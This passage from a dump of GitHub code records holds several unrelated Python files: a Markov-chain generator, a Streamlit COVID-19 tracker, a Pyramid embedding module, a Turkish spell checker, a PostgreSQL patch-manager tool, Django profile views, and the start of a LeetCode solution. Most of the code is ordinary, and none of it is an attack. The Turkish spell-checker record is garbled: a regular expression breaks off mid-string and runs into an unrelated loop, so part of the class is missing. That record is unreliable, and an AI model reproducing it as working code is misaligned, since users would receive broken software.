{}\".format(next_key))\n if next_key is None:\n return string\n split_key = next_key.split()\n string += split_key[1] + \" \"\n prev_key = next_key\n else:\n keys = list(self.table)\n random_key = random.choice(keys)\n string += random_key + \" \"\n prev_key = random_key\n return string.capitalize()\n\n def build_chain(self, list_of_words):\n for word in list_of_words:\n self.table[word] = {}\n prev_word = None\n prev_prev_word = None\n for word in list_of_words:\n if prev_word and prev_prev_word is None:\n prev_word = word\n elif prev_prev_word is None and prev_word is not None:\n prev_prev_word = prev_word\n prev_word = word\n elif prev_word and prev_prev_word is not None:\n try:\n key = prev_prev_word + \" \" + prev_word\n self.table[key][word] += 1\n except:\n key = prev_prev_word + \" \" + prev_word\n new_key = prev_word + \" \" + word\n self.table[key] = {new_key: 1}\n try:\n prev_prev_word = prev_word\n prev_word = word\n except:\n prev_word = word\n\nif __name__ == \"__main__\":\n markov_chain = Markov_Chain()\n sample_list = [\n \"A\", \"man,\", \"a\", \"plan,\", \"a\",\n \"canal:\", \"Panama!\", \"A\", \"dog,\",\n \"a\", \"panic\", \"in\", \"a\", \"pagoda!\"\n ]\n markov_chain.build_chain(sample_list)\n string = markov_chain.random_walk(8)\n print(string)\n","repo_name":"MakeSchool-17/twitter-bot-python-beingadrian","sub_path":"10_flask/markov_2.py","file_name":"markov_2.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"656452794","text":"# Library imports\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom plotly.offline import iplot\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom pandas.io.json import json_normalize\nfrom streamlit.script_runner import StopException, RerunException\n\n\nfig = go.Figure()\n\nst.write(\"\"\"\n # Covid 19 Tracking App 🚑\n \"\"\")\nst.write(\"\"\"\n This is a web app build by CIT Group 6 Cohort 2, that tracks the covid 19 cases in the world.\n \"\"\")\n\nurl = 'https://api.covid19api.com/countries'\nr = requests.get(url)\ndf0 = json_normalize(r.json())\n\ntop_row = pd.DataFrame(\n {'Country': ['Select a Country'], 'Slug': ['Empty'], 'ISO2': ['E']}\n)\n\n# Concatenate with the old frame and reset the Index\ndf0 = pd.concat([top_row, df0]).reset_index(drop=True)\n\nst.sidebar.header('Create/Filter search')\ngraph_type = st.sidebar.selectbox(\n 'Cases type', ('confirmed', 'deaths', 'recovered'))\nst.sidebar.subheader('Search by country')\ncountryX = st.sidebar.selectbox('Country', df0.Country)\ncountryY = st.sidebar.selectbox('Compare with another country', df0.Country)\n\nif st.sidebar.button('Refresh Data'):\n raise RerunException(st.ScriptRequestQueue.RerunData(None))\n\nif countryX != 'Select a Country':\n slug = df0.Slug[df0['Country'] == countryX].to_string(index=False)[1:]\n url = 'https://api.covid19api.com/total/dayone/country/'+slug+'/status/'+graph_type\n r = requests.get(url)\n st.write(\"\"\"# Total \"\"\" + graph_type + \"\"\" cases in \"\"\" +\n countryX + \"\"\" are: \"\"\"+str(r.json()[-1].get(\"Cases\")))\n df = json_normalize(r.json())\n layout = go.Layout(\n title=countryX + '\\'s ' + graph_type + ' cases Data',\n xaxis=dict(title='Date'),\n yaxis=dict(title='Number of cases'),)\n\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Scatter(x=df.Date, y=df.Cases,\n mode='lines', name=countryX))\n\n if countryY != 'Select a Country':\n slug1 = df0.Slug[df0['Country'] == countryY].to_string(index=False)[1:]\n url = 'https://api.covid19api.com/total/dayone/country/'+slug1+'/status/'+graph_type\n r = requests.get(url)\n st.write(\"\"\"# Total \"\"\" + graph_type + \"\"\" cases in \"\"\" + countryY + \"\"\"are : \"\"\" +\n str(r.json()[-1].get(\"Cases\")))\n\n df = json_normalize(r.json())\n\n layout = go.Layout(\n title=countryX + ' vs ' + countryY+' ' + graph_type + ' cases Data',\n xaxis=dict(title='Date'),\n yaxis=dict(title='Number of cases'),\n )\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Scatter(x=df.Date, y=df.Cases,\n mode='lines', name=countryY))\n\n st.plotly_chart(fig, use_container_width=True)\n\n\nelse:\n url = 'https://api.covid19api.com/world/total'\n r = requests.get(url)\n total = r.json()['TotalConfirmed']\n deaths = r.json()['TotalDeaths']\n recovered = r.json()['TotalRecovered']\n st.write(\"\"\"\n # WordlWide Data:\n \"\"\")\n st.write(\"Total cases: \"+str(total)+\", Total deaths: \" +\n str(deaths)+\", Total recovered: \"+str(recovered))\n x = [\"TotalCases\", \"TotalDeaths\", \"TotalRecovered\"]\n y = [total, deaths, recovered]\n\n layout = go.Layout(\n title='World Data',\n xaxis=dict(title=\"Category\"),\n yaxis=dict(title=\"Number of cases\"),\n )\n\n fig.update_layout(dict1=layout, overwrite=True)\n fig.add_trace(go.Bar(name='World Data', x=x, y=y))\n st.plotly_chart(fig, use_container_width=True)\n","repo_name":"okellodaniel/Covid-Tracker","sub_path":"Covid_19_Tracker.py","file_name":"Covid_19_Tracker.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38402532791","text":"from copy import deepcopy\nfrom .cache import ManagerLRUCache\nfrom past.builtins import basestring\nfrom posixpath import join\nfrom pyramid.compat import (\n native_,\n unquote_bytes_to_wsgi,\n)\nfrom pyramid.httpexceptions import HTTPNotFound\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef includeme(config):\n config.scan(__name__)\n config.add_renderer('null_renderer', NullRenderer)\n config.add_request_method(embed, 'embed')\n config.add_request_method(lambda request: set(), '_embedded_uuids', reify=True)\n config.add_request_method(lambda request: set(), '_linked_uuids', reify=True)\n config.add_request_method(lambda request: None, '__parent__', reify=True)\n\n\ndef make_subrequest(request, path):\n \"\"\" Make a subrequest\n\n Copies request environ data for authentication.\n\n May be better to just pull out the resource through traversal and manually\n perform security checks.\n \"\"\"\n env = request.environ.copy()\n if path and '?' in path:\n path_info, query_string = path.split('?', 1)\n path_info = path_info\n else:\n path_info = path\n query_string = ''\n env['PATH_INFO'] = path_info\n env['QUERY_STRING'] = query_string\n subreq = request.__class__(env, method='GET', content_type=None,\n body=b'')\n subreq.remove_conditional_headers()\n # XXX \"This does not remove headers like If-Match\"\n subreq.__parent__ = request\n return subreq\n\n\nembed_cache = ManagerLRUCache('embed_cache')\n\n\ndef embed(request, *elements, **kw):\n \"\"\" as_user=True for current user\n \"\"\"\n # Should really be more careful about what gets included instead.\n # Cache cut response time from ~800ms to ~420ms.\n as_user = kw.get('as_user')\n path = join(*elements)\n path = unquote_bytes_to_wsgi(native_(path))\n log.debug('embed: %s', path)\n if as_user is not None:\n result, embedded, linked = _embed(request, path, as_user)\n else:\n cached = embed_cache.get(path, None)\n if cached is None:\n cached = _embed(request, path)\n embed_cache[path] = cached\n result, embedded, linked = cached\n result = deepcopy(result)\n request._embedded_uuids.update(embedded)\n request._linked_uuids.update(linked)\n return result\n\n\ndef _embed(request, path, as_user='EMBED'):\n subreq = make_subrequest(request, path)\n subreq.override_renderer = 'null_renderer'\n if as_user is not True:\n if 'HTTP_COOKIE' in subreq.environ:\n del subreq.environ['HTTP_COOKIE']\n subreq.remote_user = as_user\n try:\n result = request.invoke_subrequest(subreq)\n except HTTPNotFound:\n raise KeyError(path)\n return result, subreq._embedded_uuids, subreq._linked_uuids\n\n\ndef expand_path(request, obj, path):\n if isinstance(path, basestring):\n path = path.split('.')\n if not path:\n return\n name = path[0]\n remaining = path[1:]\n value = obj.get(name, None)\n if value is None:\n return\n if isinstance(value, list):\n for index, member in enumerate(value):\n if not isinstance(member, dict):\n member = value[index] = request.embed(member, '@@object')\n expand_path(request, member, remaining)\n else:\n if not isinstance(value, dict):\n value = obj[name] = request.embed(value, '@@object')\n expand_path(request, value, remaining)\n\n\nclass NullRenderer:\n '''Sets result value directly as response.\n '''\n def __init__(self, info):\n pass\n\n def __call__(self, value, system):\n request = system.get('request')\n if request is None:\n return value\n request.response = value\n return None\n","repo_name":"ClinGen/clincoded","sub_path":"src/contentbase/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"37230370795","text":"import re\nimport locale\nimport Corpus\nimport listeler\nfrom NGram.NGram import NGram\nfrom Dictionary.Word import Word\nfrom Corpus.Sentence import Sentence\nfrom NGram.NoSmoothing import NoSmoothing\nfrom SpellChecker.NGramSpellChecker import NGramSpellChecker\nfrom SpellChecker.SimpleSpellChecker import SimpleSpellChecker\nfrom SpellChecker.TrieBasedSpellChecker import TrieBasedSpellChecker\nfrom SpellChecker.SpellCheckerParameter import SpellCheckerParameter\nfrom MorphologicalAnalysis.FsmMorphologicalAnalyzer import FsmMorphologicalAnalyzer\n\n\nclass turkish_denet:\n nGram = NGram('../data/ngram.txt')\n def __init__(self, text=\"\"):\n self.fsm = FsmMorphologicalAnalyzer()\n self.parameter = SpellCheckerParameter()\n self.nGram = NGram(\"../data/ngram.txt\")\n self.text = text\n self.searchfile = open(\"../data/VERB_TS_Corpus_Frequency_List.txt\", \"r\", encoding=\"utf8\")\n self.nGram.calculateNGramProbabilitiesSimple(NoSmoothing())\n self.trieSpellChecker = TrieBasedSpellChecker(self.fsm, self.nGram, self.parameter)\n self.nGramSpellChecker = NGramSpellChecker(self.fsm, self.nGram, self.parameter)\n self.turkcekelime = []\n\n\n\n def kisaltmakontrol(self,text):\n kisaltList = listeler.kisaltList\n uzunhaller = listeler.uzunhaller\n words = text.split()\n for i in range(len(words)):\n if words[i] in kisaltList:\n index = kisaltList.index(words[i])\n words[i] = uzunhaller[index]\n result = \" \".join(words)\n result = \" \".join(result.split())\n return text\n\n def kelimekontrol(self, text):\n kelimeler = set(self.turkcekelime)\n generated_words = set()\n misspellings = {}\n context_list = []\n turkish_word = set()\n\n\n with open(\"../data/generated_words.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n generated_words.add(line.strip())\n\n\n with open(\"../data/turkish_dictionary.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n self.turkcekelime.append(line.strip())\n\n\n with open(\"../data/turkish_misspellings.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n correct_word, misspelled_word = line.strip().split()\n misspellings[misspelled_word] = correct_word\n\n\n with open(\"../data/turkish_words.txt\",\"r\",encoding=\"utf-8\") as file:\n for line in file:\n turkish_word.add(line.strip())\n\n\n\n with open(\"../data/context_list.txt\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n context_list.append(line.strip())\n\n words = text.split()\n filtered_words = []\n for word in words:\n ana_kelime = word.strip(\",.!?\")\n if ana_kelime in kelimeler:\n filtered_words.append(word)\n elif ana_kelime in generated_words:\n filtered_words.append(word)\n elif ana_kelime in misspellings:\n filtered_words.append(word)\n elif ana_kelime in turkish_word:\n filtered_words.append(word)\n else:\n filtered_words.append(\"\")\n\n filtered_text = \" \".join(filtered_words)\n\n\n for context in context_list:\n if context in filtered_text:\n filtered_text = filtered_text.replace(context, \"\")\n\n\n with open(\"../data/filtered_text.txt\", \"w\", encoding=\"utf-8\") as file:\n file.write(filtered_text)\n\n return filtered_text\n\n def kucukHarfeDonustur(self,text):\n words = text.split()\n lowercased_words = [word.lower() for word in words]\n return \" \".join(lowercased_words)\n\n def noktalamaTemizleyicisi(self, text):\n regex = r\"(? 0:\n if i == 0:\n capitalized_word = word[0].upper() + word[1:].lower()\n elif kelimeler[i - 1].endswith((\".\", \"?\", \"!\")):\n capitalized_word = word[0].upper() + word[1:].lower()\n else:\n capitalized_word = word.lower()\n capitalized_words.append(capitalized_word)\n\n buyukharf = ' '.join(capitalized_words)\n return buyukharf\n\n\n\n\n\n\n\n\n","repo_name":"yusufbaykal/TurkceYazimDenetim","sub_path":"YazımDenetim/turkish_yaz.py","file_name":"turkish_yaz.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22868100278","text":"def hargaMahal():\n List1=[]\n List2=[]\n for x,y in buah.items():\n print('-',x,', Harga: Rp.',y,)\n List1.append(y)\n List2.append(x)\n a=max(List1)\n b=List1.index(a)\n print('Buah yang harganya paling mahal adalah:',List2[b])\n \n\nbuah={'apel':5000,'jeruk':8500,'mangga':7800,'duku':6500}\nprint('*****DAFTAR HARGA BUAH*****')\n\nhargaMahal()\n","repo_name":"aniszahrodl/Praktikum-Chapter-08","sub_path":"LATIHAN/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ms","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21848856581","text":"#!/usr/bin/env python3\n\"\"\"Tool for managing database, patches, and db_schema.sql file.\"\"\"\n\nimport collections\nfrom enum import Enum\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom tools.db_manager import db\nfrom tools.db_manager import db_instance\nfrom tools.db_manager import file_reader\nfrom tools.db_manager import patch_reader\nfrom tools.workspace import workspace\n\n_HOME_DIR = os.path.expanduser('~')\n_WORKSPACE = workspace.get_path()\n_LINE = '--------------------------------------------------'\n\n_SqlUpgrade = collections.namedtuple(\n 'SqlUpgrade',\n ['query', 'files', 'hashes', 'followups'])\n\n_PythonUpgrade = collections.namedtuple(\n 'PythonUpgrade',\n ['script', 'files', 'hashes'])\n\n_ShellUpgrade = collections.namedtuple(\n 'ShellUpgrade',\n ['script', 'files', 'hashes'])\n\ndef _should_continue(prompt):\n cont = input('{} [y/n] '.format(prompt))\n return bool(re.match(r'[yY]', cont))\n\ndef _save_current_db_schema(schema_path):\n if not _should_continue(\n 'This will override changes to {}, continue?'.format(\n schema_path)):\n return\n with open(schema_path, 'wt', encoding='utf8') as schema_file:\n schema_file.write(db_instance.get_schema())\n\ndef _get_next_upgrade():\n upgrades = list(_get_next_batch_of_upgrades())\n if len(upgrades) == 0:\n return None\n\n # If there's only one upgrade, it may be a Python upgrade. Python upgrades\n # cannot be joined, so we don't have to worry about them when there are more\n # than one upgrade.\n if len(upgrades) == 1 and (\n isinstance(upgrades[0], _PythonUpgrade)\n or isinstance(upgrades[0], _ShellUpgrade)):\n return upgrades[0]\n return _combine_sql_upgrades(upgrades)\n\ndef _get_next_batch_of_upgrades():\n is_first = True\n for upgrade in _get_upgrades():\n if (not isinstance(upgrade, _SqlUpgrade)\n or _query_must_be_split(upgrade.query + ';')):\n if is_first:\n yield upgrade\n break\n yield upgrade\n is_first = False\n\ndef _get_upgrades():\n patches = patch_reader.get_unapplied_patches()\n for patch in patches:\n if patch.type == patch_reader.PatchType.SQL:\n yield _SqlUpgrade(\n patch.content, [patch.file_path], [patch.hash], [''])\n elif patch.type == patch_reader.PatchType.PYTHON:\n yield _PythonUpgrade(\n patch.file_path, [patch.file_path], [patch.hash])\n else:\n assert patch.type == patch_reader.PatchType.SHELL\n yield _ShellUpgrade(\n patch.file_path, [patch.file_path], [patch.hash])\n\ndef _combine_sql_upgrades(upgrades):\n out = []\n out_files = []\n out_hashes = []\n followups = []\n for upgrade in upgrades:\n assert isinstance(upgrade, _SqlUpgrade)\n out.append(\n _LINE + '\\n'\n + '-- Upgrades:\\n{}'.format(\n _format_file_list(upgrade.files, '-- ')))\n out.append('')\n out.append(upgrade.query.strip())\n out.append('')\n insert_hash = 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes))\n out.append(insert_hash)\n followups.append(insert_hash)\n out_files.extend(upgrade.files)\n out_hashes.extend(upgrade.hashes)\n if len(out) == 0:\n raise Exception('No upgrade found.')\n return _SqlUpgrade(\n '\\n'.join(out), out_files, out_hashes, followups)\n\ndef _format_hashes_for_insert(hashes):\n begin = '\\n (\\'\\\\x'\n end = '\\')'\n return begin + (end + ',' + begin).join(hashes) + end\n\ndef _get_saved_schema_content_at_commit(schema_path, commit):\n saved_schema_path = schema_path\n if saved_schema_path[0:len(_WORKSPACE)] == _WORKSPACE:\n saved_schema_path = saved_schema_path[len(_WORKSPACE) + 1:]\n return _get_file_at_commit(commit, saved_schema_path)\n\ndef _get_file_at_commit(commit, file):\n return subprocess.check_output(\n [\n 'git',\n 'show',\n '{}:{}'.format(commit, file)\n ]).decode('utf8')\n\ndef upgrade(schema_path, force=False):\n if not force and not _do_next_batch_upgrade(force):\n print('Database is already up to date.')\n else:\n while _do_next_batch_upgrade(force):\n pass\n if not force:\n _verify_saved_schema_matches_current_schema(schema_path)\n patch_reader.verify_no_invalid_hashes()\n\ndef _do_next_batch_upgrade(force=False):\n upgrade = _get_next_upgrade()\n if upgrade is None:\n return False\n\n if not force:\n print('')\n print('UPGRADE TO BE APPLIED')\n print('')\n if isinstance(upgrade, _SqlUpgrade):\n print(upgrade.query)\n else:\n assert (\n isinstance(upgrade, _PythonUpgrade)\n or isinstance(upgrade, _ShellUpgrade))\n print(upgrade.script)\n print(_LINE)\n print('')\n if not _should_continue(\n 'Apply upgrades from the following files?\\n{}'.format(\n _format_file_list(upgrade.files, ' '))):\n sys.exit(1)\n\n if isinstance(upgrade, _SqlUpgrade):\n if _query_must_be_split(upgrade.query):\n _db_query(upgrade.query, force)\n else:\n assert len(upgrade.files) == len(upgrade.followups)\n for i, file in enumerate(upgrade.files):\n _db_query_file(file, force)\n _db_query(upgrade.followups[i], force)\n elif isinstance(upgrade, _PythonUpgrade):\n _execute_python(upgrade.script)\n _db_query(\n 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes)))\n else:\n assert isinstance(upgrade, _ShellUpgrade)\n _execute_shell_script(upgrade.script)\n _db_query(\n 'INSERT INTO db_patches (hash) VALUES {};'.format(\n _format_hashes_for_insert(upgrade.hashes)))\n\n return True\n\ndef _format_file_list(files, prefix):\n relative_files = []\n if _WORKSPACE[-1] == '/':\n root = _WORKSPACE\n else:\n root = _WORKSPACE + '/'\n root_length = len(root)\n for file in files:\n assert file[0:root_length] == root\n relative_files.append('//' + file[root_length:])\n return prefix + ('\\n' + prefix).join(relative_files)\n\ndef _verify_saved_schema_matches_current_schema(schema_path):\n diff = _diff_current_schema_vs_saved_schema(schema_path)\n if diff:\n print(\n 'Warning: Current schema does not match saved schema in codebase.')\n print(diff)\n\ndef _diff_current_schema_vs_saved_schema(schema_path):\n saved_schema = file_reader.read(schema_path)\n current_schema = db_instance.get_schema()\n if _schemas_equal(current_schema, saved_schema):\n return ''\n with tempfile.NamedTemporaryFile('wt', encoding='utf8') as schema_file:\n schema_file.write(current_schema)\n schema_file.flush()\n try:\n return subprocess.check_output(\n [\n 'git',\n '--no-pager',\n 'diff',\n '--color',\n '--ignore-space-at-eol',\n schema_path,\n schema_file.name\n ]).stdout.decode('utf8')\n # `git diff` has a non-zero exit code when there is a diff, seemingly by\n # default, at least for me -- even though the docs make it sound like\n # you need to specify `--exit-code` for this behavior.\n except subprocess.CalledProcessError as err:\n return err.output.decode('utf8')\n\ndef _schemas_equal(schema_a, schema_b):\n rep = re.compile(r'\\s+')\n return rep.sub('', schema_a) == rep.sub('', schema_b)\n\ndef _query_must_be_split(query):\n return (\n re.search(r'ALTER TYPE', query, flags=re.IGNORECASE)\n and re.search(r'\\;(.|\\n)*\\;', query))\n\n# This is not comprehensive. Any string in the query which contains a semicolon\n# will break the ability to split. This is just common with functions and\n# uncommon with other queries, so this is a close approximation.\n# TODO: To adequately solve this issue we need to be able to appropriately parse\n# PostgreSQL strings or any other expressions which may contain semicolons not\n# used as a line terminator. OR we can just stop using enums, avoiding the need\n# to split queries entirely.\ndef _query_cannot_be_split(query):\n return re.search(r'CREATE (?:OR REPLACE )?FUNCTION', query)\n\ndef _db_query(query, force=False):\n if _query_must_be_split(query):\n if _query_cannot_be_split(query):\n raise Exception(\n 'Query cannot be executed due to the use of both ALTER TYPEs '\n 'and CREATE FUNCTIONs. The best path forward is probably to '\n 'apply ALTER TYPE statements manually and then try to rerun '\n 'the upgrade again without them.')\n if not force:\n if not _should_continue(\n 'Warning: This query cannot be run as a transaction. '\n 'Split into multiple queries?'):\n sys.exit(0)\n out = []\n for part in query.split(';'):\n result = _db_query(part)\n if result != '':\n out.append(result)\n return '\\n'.join(out)\n return db_instance.query(query)\n\ndef _db_query_file(file, force=False):\n return db_instance.query_file(file)\n\ndef _execute_python(script):\n with open(script, 'rb') as file:\n code = compile(file.read(), script, 'exec')\n exec(code, {\n '__file__': script,\n '__name__': '__main__',\n })\n\ndef _execute_shell_script(script):\n env = os.environ.copy()\n env['PATCHES_ROOT'] = patch_reader.get_patch_dir()\n subprocess.check_call([script], env=env)\n\ndef _write_file(filename, content):\n _mkdir_p(os.path.dirname(filename))\n with open(filename, 'wt', encoding='utf8') as file:\n file.write(content)\n\ndef _cp_f(source, destination):\n _mkdir_p(os.path.dirname(destination))\n shutil.copyfile(source, destination)\n\ndef _mkdir_p(path):\n sub_path = os.path.dirname(path)\n if not os.path.exists(sub_path):\n _mkdir_p(sub_path)\n if not os.path.exists(path):\n os.mkdir(path)\n\ndef _verify_db_up_to_date(schema_path):\n diff = _diff_current_schema_vs_saved_schema(schema_path)\n exit_with_failure = False\n if diff:\n print(diff)\n exit_with_failure = True\n patches = patch_reader.get_unapplied_patches()\n if len(patches) > 0:\n print('Missing patches:')\n for patch in patches:\n print(patch.file_path)\n exit_with_failure = True\n if exit_with_failure:\n sys.exit(1)\n\ndef _init(schema_path, dbname, force=False):\n if not force:\n if not _should_continue(\n 'This will initialize your local database, continue?'):\n return\n _super_db_query('CREATE DATABASE {};'.format(db.get_db_name()))\n _super_db_query('ALTER DATABASE {} OWNER TO {}'.format(\n db.get_db_name(),\n db.get_db_user()))\n db.query(\n 'CREATE TABLE db_patches ( '\n 'hash bytea PRIMARY KEY NOT NULL, '\n 'applied_time timestamp with time zone DEFAULT now() NOT NULL '\n 'CHECK (date_part(\\'timezone\\', applied_time) = 0));')\n db_instance.rewind_invalid_patches()\n upgrade(schema_path, force)\n\ndef _super_db_query(query):\n return subprocess.check_output(\n [\n 'sudo',\n '-u', 'postgres',\n 'psql',\n '-At',\n '-c', query\n ]).decode('utf8')\n\ndef _has_arg(argv, arg):\n for u in argv[1:]:\n if u == arg:\n return True\n return False\n\ndef _get_command_from_args(argv):\n for u in argv[1:]:\n if u[0:1] != '-':\n return u\n return ''\n\ndef set_patch_dir(dir):\n patch_reader.set_patch_dir(dir)\n\ndef set_config_files(files):\n db_instance.set_config_files(files)\n\ndef main(argv):\n schema_path = None\n\n for arg in sys.argv[1:]:\n matches = re.search(r'^--(db_config|patches|schema)\\=(.*)$', arg)\n if matches:\n if matches.group(1) == 'db_config':\n set_config_files(matches.group(2).split(','))\n elif matches.group(1) == 'patches':\n set_patch_dir(matches.group(2))\n elif matches.group(1) == 'schema':\n schema_path = matches.group(2)\n else:\n raise Exception('Unknown param \"{}\"'.format(matches.group(1)))\n\n command = _get_command_from_args(argv)\n force = _has_arg(argv, '-y')\n dev_mode = _has_arg(argv, '--dev_mode')\n db_instance.set_dev_mode(dev_mode)\n dev_mode_allowed = _has_arg(argv, '--WARNING__permit_data_loss')\n\n if dev_mode and not command == 'init':\n if not dev_mode_allowed:\n raise Exception(\n 'In order to use dev_mode, you must pass the parameter '\n '--WARNING__permit_data_loss.')\n db_instance.rewind_invalid_patches()\n\n if command == 'init':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n _init(schema_path, force)\n elif command == 'upgrade':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n upgrade(schema_path, force)\n elif command == 'show_upgrade':\n next_upgrade = _get_next_upgrade()\n if next_upgrade:\n if isinstance(next_upgrade, _SqlUpgrade):\n upgrade_contents = 'SQL: ' + upgrade.query\n elif isinstance(next_upgrade, _PythonUpgrade):\n upgrade_contents = 'Python: ' + next_upgrade.script\n else:\n assert isinstance(next_upgrade, _ShellUpgrade)\n upgrade_contents = 'Shell Script: ' + next_upgrade.script\n print(upgrade_contents)\n elif command == 'show_current_schema':\n print(db_instance.get_schema())\n elif command == 'save_current_schema':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n _save_current_db_schema(schema_path)\n elif command == 'verify':\n if schema_path is None:\n raise Exception('Schema path was not provided.')\n _verify_db_up_to_date(schema_path)\n elif command == 'database_name':\n print(db_instance.get_db_name())\n elif command == 'connect':\n db_instance.connect_repl()\n elif command == 'query':\n print(db_instance.query(sys.stdin.read()))\n elif command == 'query_file':\n print(db_instance.query_file(argv[-1]))\n else:\n raise Exception('Invalid command: {}\\n{}'.format(\n command,\n 'Expected one of: verify, upgrade, show_upgrade, '\n 'show_current_schema, save_current_schema, database_name, '\n 'connect, query, query_file'))\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"ProofOfDonut/pillsbury","sub_path":"tools/db_manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":15019,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"8937940717","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.translation import get_language\nfrom django.contrib.auth.models import User\nfrom rest_framework.authtoken.models import Token\nfrom tenant_configuration.decorators import tenant_configuration_required\nfrom tenant_profile.decorators import tenant_profile_required\nfrom tenant_intake.decorators import tenant_intake_required\nfrom tenant_reception.decorators import tenant_reception_required\nfrom foundation_tenant.decorators import tenant_required\nfrom foundation_tenant.forms.postaladdressform import PostalAddressForm\nfrom foundation_tenant.models.base.me import Me\nfrom foundation_tenant.models.base.countryoption import CountryOption\nfrom foundation_tenant.models.base.provinceoption import ProvinceOption\nfrom foundation_tenant.models.base.cityoption import CityOption\nfrom foundation_tenant.models.base.postaladdress import PostalAddress\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_page(request):\n return render(request, 'tenant_profile/me/generic/view.html',{\n 'page': 'profile',\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_profile_page(request):\n return render(request, 'tenant_profile/me/settings/profile/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_address_page(request):\n address = request.tenant_me.address\n countries = CountryOption.objects.all()\n provinces = [] if not address.country else ProvinceOption.objects.filter(country=address.country)\n return render(request, 'tenant_profile/me/settings/address/view.html',{\n 'page': 'profile',\n 'countries': countries,\n 'provinces': provinces,\n 'address': address,\n 'form': PostalAddressForm(instance=address),\n 'accepted_fields': [\n 'id_postal_code', 'id_street_number', 'id_suffix', 'id_street_name',\n 'id_suite_number', 'id_address_line_2', 'id_address_line_3',\n ]\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_password_page(request):\n return render(request, 'tenant_profile/me/settings/password/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\n@tenant_intake_required\n@tenant_reception_required\n@tenant_profile_required\n@tenant_configuration_required\ndef profile_settings_notification_page(request):\n return render(request, 'tenant_profile/me/settings/notification/view.html',{\n 'page': 'profile'\n })\n\n\n@login_required(login_url='/en/login')\n@tenant_required\ndef locked_page(request):\n \"\"\"Function will lock the User out of our system and will require a password authentication to be let back in.\"\"\"\n request.tenant_me.is_locked=True\n request.tenant_me.save()\n return render(request, 'tenant_profile/me/locked/view.html',{\n 'page': 'profile',\n })\n\n\n@tenant_profile_required\n@tenant_required\ndef tenant_profile_is_locked_page(request):\n from django.http import JsonResponse\n \"\"\"Function will return either True or False depending if a subdomain exists or not.\"\"\"\n return JsonResponse({\n 'access-granted':True\n })\n","repo_name":"smegurus/smegurus-django","sub_path":"tenant_profile/views/me_views.py","file_name":"me_views.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15610595941","text":"\"\"\"\n\n1275. Find Winner on a Tic Tac Toe Game\nEasy\n\nTic-tac-toe is played by two players A and B on a 3 x 3 grid. The rules of Tic-Tac-Toe are:\n\nPlayers take turns placing characters into empty squares ' '.\nThe first player A always places 'X' characters, while the second player B always places 'O' characters.\n'X' and 'O' characters are always placed into empty squares, never on filled ones.\nThe game ends when there are three of the same (non-empty) character filling any row, column, or diagonal.\nThe game also ends if all squares are non-empty.\nNo more moves can be played if the game is over.\nGiven a 2D integer array moves where moves[i] = [rowi, coli] indicates that the ith move will be played on grid[rowi][coli]. return the winner of the game if it exists (A or B). In case the game ends in a draw return \"Draw\". If there are still movements to play return \"Pending\".\n\nYou can assume that moves is valid (i.e., it follows the rules of Tic-Tac-Toe), the grid is initially empty, and A will play first.\n\n \n\nExample 1:\n\n\nInput: moves = [[0,0],[2,0],[1,1],[2,1],[2,2]]\nOutput: \"A\"\nExplanation: A wins, they always play first.\nExample 2:\n\n\nInput: moves = [[0,0],[1,1],[0,1],[0,2],[1,0],[2,0]]\nOutput: \"B\"\nExplanation: B wins.\nExample 3:\n\n\nInput: moves = [[0,0],[1,1],[2,0],[1,0],[1,2],[2,1],[0,1],[0,2],[2,2]]\nOutput: \"Draw\"\nExplanation: The game ends in a draw since there are no moves to make.\n \n\nConstraints:\n\n1 <= moves.length <= 9\nmoves[i].length == 2\n0 <= rowi, coli <= 2\nThere are no repeated elements on moves.\nmoves follow the rules of tic tac toe.\n\n\"\"\"\n\n# V0\n\n# V1\n# IDEA : BRUTE 